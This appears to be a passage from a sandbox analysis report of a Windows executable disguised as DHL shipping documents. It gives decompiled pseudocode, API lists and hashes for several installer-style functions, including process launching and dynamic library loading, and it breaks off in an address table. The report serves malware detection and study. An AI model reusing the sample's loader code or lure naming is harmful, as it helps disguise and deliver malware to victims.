                        • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 69%
                        			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}











                        0x0040138a
                        0x004013fa
                        0x0040139b
                        0x004013a0
                        0x00000000
                        0x00000000
                        0x004013a2
                        0x004013a3
                        0x004013ad
                        0x00000000
                        0x00401404
                        0x004013b0
                        0x004013b7
                        0x004013bd
                        0x004013be
                        0x004013c0
                        0x004013c2
                        0x004013b9
                        0x004013b9
                        0x004013ba
                        0x004013ba
                        0x004013c9
                        0x004013cb
                        0x004013f4
                        0x004013f4
                        0x004013c9
                        0x00000000

                        APIs
                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                        • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend
                        • String ID:
                        • API String ID: 3850602802-0
                        • Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                        • Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
                        • Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
                        • Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405C4B Relevance: 3.0, APIs: 2, Instructions: 24processCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405C4B(WCHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x426750->cb = 0x44;
				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x426750,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                        0x00405c54
                        0x00405c74
                        0x00405c7c
                        0x00405c81
                        0x00000000
                        0x00405c87
                        0x00405c8b

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID:
                        • API String ID: 3712363035-0
                        • Opcode ID: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                        • Instruction ID: 91309136e62a13352d93043ad9bb7922807806bb2ea2f765c8e9c4a894a003d9
                        • Opcode Fuzzy Hash: ab61a979a714f7ec4effc1a78875f568a822f35fd178278bd28005db307d5d14
                        • Instruction Fuzzy Hash: 59E0B6B4600209BFFB109B64EE09F7B7BADFB04648F414565BD51F2190D778A8158A78
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                        0x00406a3d
                        0x00406a40
                        0x00406a47
                        0x00406a4f
                        0x00406a5b
                        0x00000000
                        0x00406a62
                        0x00406a52
                        0x00406a59
                        0x00000000
                        0x00406a6a
                        0x00000000

                        APIs
                        • GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                          • Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
                          • Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
                          • Part of subcall function 004069C5: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A2B
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                        • String ID:
                        • API String ID: 2547128583-0
                        • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                        • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                        • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 68%
                        			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                        0x0040615c
                        0x00406169
                        0x0040617e
                        0x00406184

                        APIs
                        • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL AWB SHIPPING DOCS_AWB_0009123.exe,80000000,00000003), ref: 0040615C
                        • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$AttributesCreate
                        • String ID:
                        • API String ID: 415043291-0
                        • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                        • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                        • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406133 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406133(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
				}
				return _t7;
			}





                        0x00406138
                        0x0040613e
                        0x00406143
                        0x0040614c
                        0x0040614c
                        0x00406155

                        APIs
                        • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                        • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                        • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                        • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                        0x00405c1c
                        0x00405c24
                        0x00000000
                        0x00405c2a
                        0x00000000

                        APIs
                        • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                        • GetLastError.KERNEL32 ref: 00405C2A
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: CreateDirectoryErrorLast
                        • String ID:
                        • API String ID: 1375471231-0
                        • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                        • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                        • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004035F8 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004035F8(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                        0x00403606
                        0x0040360c

                        APIs
                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID:
                        • API String ID: 973152223-0
                        • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                        • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                        • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                        Download Yara Rule
                        C-Code - Quality: 78%
                        			E00401FA4() {
				void* _t9;
				char _t13;
				void* _t15;
				void* _t17;
				void* _t20;
				void* _t22;

				_t19 = E00402DA6(_t15);
				E004056CA(0xffffffeb, _t7);
				_t9 = E00405C4B(_t19); // executed
				_t20 = _t9;
				if(_t20 == _t15) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
						_t13 = E00406AE0(_t17, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
							if(_t13 != _t15) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}









                        0x00401faa
                        0x00401faf
                        0x00401fb5
                        0x00401fba
                        0x00401fbe
                        0x0040292e
                        0x00401fc4
                        0x00401fc7
                        0x00401fca
                        0x00401fd2
                        0x00401fe1
                        0x00401fe3
                        0x00401fe3
                        0x00401fd4
                        0x00401fd8
                        0x00401fd8
                        0x00401fd2
                        0x00401fea
                        0x00401feb
                        0x00401feb
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                          • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                          • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                          • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                          • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                          • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                        • String ID:
                        • API String ID: 2972824698-0
                        • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                        • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                        • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                        • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 95%
                        			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60);
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

































                        0x00405811
                        0x00405817
                        0x00405821
                        0x00405824
                        0x004059ba
                        0x004059de
                        0x004059de
                        0x004059f1
                        0x00405a0f
                        0x00405a11
                        0x00405a19
                        0x00405a6f
                        0x00405a73
                        0x00000000
                        0x00000000
                        0x00405a75
                        0x00405a7b
                        0x00000000
                        0x00000000
                        0x00405a85
                        0x00405a8d
                        0x00405a90
                        0x00405b92
                        0x00000000
                        0x00405b92
                        0x00405a9f
                        0x00405aaa
                        0x00405ab3
                        0x00405abe
                        0x00405ac1
                        0x00405aca
                        0x00405ad0
                        0x00405ad3
                        0x00405ad3
                        0x00405aeb
                        0x00405af4
                        0x00405af7
                        0x00405afe
                        0x00405b05
                        0x00405b0d
                        0x00405b0d
                        0x00405b24
                        0x00405b24
                        0x00405b2b
                        0x00405b31
                        0x00405b3d
                        0x00405b44
                        0x00405b4d
                        0x00405b4f
                        0x00405b52
                        0x00405b61
                        0x00405b64
                        0x00405b6a
                        0x00405b6b
                        0x00405b71
                        0x00405b72
                        0x00405b73
                        0x00405b7b
                        0x00405b86
                        0x00405b8c
                        0x00405b8c
                        0x00000000
                        0x00405aeb
                        0x00405a21
                        0x00405a51
                        0x00405a59
                        0x00405a64
                        0x00405a64
                        0x00405a6a
                        0x00000000
                        0x00405a6a
                        0x00405a25
                        0x00405a2f
                        0x00000000
                        0x004059f3
                        0x004059f9
                        0x00405a34
                        0x00000000
                        0x00405a3d
                        0x00405a02
                        0x00405a07
                        0x00405a0a
                        0x00000000
                        0x00405a0a
                        0x004059f1
                        0x0040582a
                        0x0040582e
                        0x00405836
                        0x0040583a
                        0x0040583d
                        0x00405840
                        0x00405843
                        0x00405846
                        0x00405847
                        0x00405848
                        0x00405861
                        0x00405864
                        0x0040586e
                        0x0040587d
                        0x00405885
                        0x0040588d
                        0x00405892
                        0x00405895
                        0x004058a1
